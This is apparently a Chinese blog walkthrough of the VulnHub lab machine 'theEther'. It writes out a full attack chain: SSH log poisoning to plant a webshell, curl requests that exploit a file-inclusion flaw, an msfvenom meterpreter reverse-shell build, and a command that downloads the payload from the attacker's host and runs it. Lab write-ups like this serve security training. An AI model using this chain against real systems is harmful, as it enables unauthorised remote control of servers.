vulnhub里有一个靶机theEther提供了一个文件包含漏洞利用,很有意思,本周末实践了一下,
下载地址,http://download1023.mediafire.com/6uc2tqcmhgfg/502nbnbkarsoisb/theEther.zip,
首先在局域网内找到这个靶机,家用宽带环境,基本都是平板和手机,看到开http和ssh的肯定就是它了,
再详细扫一下服务信息,其实对漏洞利用没啥用,
访问一下页面看看,
从网上看到有人介绍/var/log/auth.log存在文件包含漏洞,
注意,下面的思路就很厉害了,
假装ssh登录,
ssh ''@192.168.128.101,
不知道密码没关系,一路回车,
这就在/var/log/auth.log里种了个一句话木马,
验证一下,
curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode cmd="pwd;ls" http://192.168.128.101 |less,
说明一句话木马生效了,
接下来看看怎么开一个反弹shell过来,
做一个meterpreter反弹shell可执行程序,
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.128.104 LPORT=4444 -f elf > shell.elf,
本地开一个http服务,python -m SimpleHTTPServer 80,
本地再开一个meterpreter反弹shell监听,
use exploit/multi/handler,
set payload linux/x86/meterpreter/reverse_tcp,
set LHOST 192.168.128.104,
exploit,
再重新ssh登录一下,
ssh ''@192.168.128.101,
把命令传进去,下载可执行程序并执行,
curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode cmd="wget http://192.168.128.104/shell.elf;chmod +x shell.elf;./shell.elf" http://192.168.128.101,
meterpreter反弹shell就过来了,
接下来可以再继续提权啥的,不再详述了。
领取专属 10元无门槛券
私享最新 技术干货